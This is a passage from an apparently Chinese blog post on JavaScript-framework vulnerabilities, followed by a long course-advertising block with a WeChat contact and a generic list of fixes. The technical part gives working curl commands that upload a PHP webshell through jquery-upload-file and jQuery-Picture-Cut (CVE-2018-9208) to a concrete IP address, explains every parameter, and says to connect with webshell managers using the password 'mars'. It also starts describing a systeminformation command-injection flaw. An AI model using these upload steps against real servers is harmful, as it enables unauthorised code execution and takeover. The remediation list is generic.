基于JavaScript的框架漏洞_javascript框架库漏洞

1.2首先在本地准备好一个后门木马shell.php

3b45fb0ff86aa3b4ad6be638689c528d.png

1.3上传文件myfile=@文件地址

curl -F “myfile=@shell.php” “ip地址/jquery-upload-file/php/upload.php”

1.4.验证是否成功

0b2a4a0cf2ebd42aeca3c72f839275d0.png

1.5.这里可以使用哥斯拉等工具进行连接,这里不过多赘述。

2、CVE-2018-9208

2.1介绍

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

2.2.准备一个一句话木马的文件

3b45fb0ff86aa3b4ad6be638689c528d.png

2.3.使用curl进行连接,观察是否上传成功。

curl -F “inputOfFile=file” -F “request=upload” -F “enableResize=0” -F “minimumWidthToResize=0” -F “minimumHeightToResize=0” -F “folderOnServer=/” -F “imageNameRandom=1” -F “maximumSize=10000” -F “enableMaximumSize=0” -F “file=@shell.php” http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php

  • -F “inputOfFile=file”:指定上传文件的参数名为"file"。
  • -F “request=upload”:指定请求类型为上传。
  • -F “enableResize=0”:禁用图片缩放功能。
  • -F “minimumWidthToResize=0”:设置图片最小宽度为0,即不限制宽度。
  • -F “minimumHeightToResize=0”:设置图片最小高度为0,即不限制高度。
  • -F “folderOnServer=/”:指定上传到服务器的目录为根目录。
  • -F “imageNameRandom=1”:设置上传后的文件名为随机生成的文件名。
  • -F “maximumSize=10000”:设置上传文件的最大大小为10000字节。
  • -F “enableMaximumSize=0”:禁用最大文件大小限制。
  • -F “file=@shell.php”:指定要上传的文件为当前目录下的"shell.php"文件。
  • http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php:指定上传的目标URL。

6472794cd06f5badafc3121117885b4b.png

2.4.使用蚁剑一键连接,连接密码为mars。

1244a3a6945977fc8618c6b690c87ac8.png

3、CVE-2021-21315(Node.js自身漏洞)

3.1介绍:

Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

面试题合集你绝对不能错过!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-Off6PoWE-1712618462061)]

  • 27
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
针对目标站点存在的JavaScript框架漏洞,修复方法通常包括以下步骤: 1. 升级框架版本:查找并确定目标站点所使用的JavaScript框架,并检查是否有已修复的版本可供升级。在升级之前,务必备份站点的相关文件和数据。 2. 应用补丁:下载并应用任何相关的安全补丁。这些补丁通常会修复已知的漏洞,并提供更强的安全性。 3. 移除或禁用不必要的功能和插件:如果站点中使用了不必要或不常用的功能和插件,最好考虑将其移除或禁用。这样可以减少潜在的攻击面并提高站点的安全性。 4. 加强输入验证和过滤:确保站点的输入验证机制和过滤器能够有效地检测和阻止恶意输入。使用正则表达式、白名单和黑名单等方法来限制用户输入,以防止跨站脚本攻击(XSS)等安全威胁。 5. 定期进行安全审计:定期对站点进行安全审计,以检测潜在的漏洞和安全风险。可以使用自动化工具或聘请安全专家进行审计。 6. 持续更新和监控:及时关注框架的更新和安全公告,并及时更新站点的相关组件。同时,定期监控站点的日志和活动,以便及时发现并应对任何异常情况。 请注意,修复漏洞需要谨慎操作,建议在测试环境中进行修复,并确保备份站点数据,以防修复过程中出现意外情况。如果您不确定如何修复漏洞,建议咨询安全专家或开发团队的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值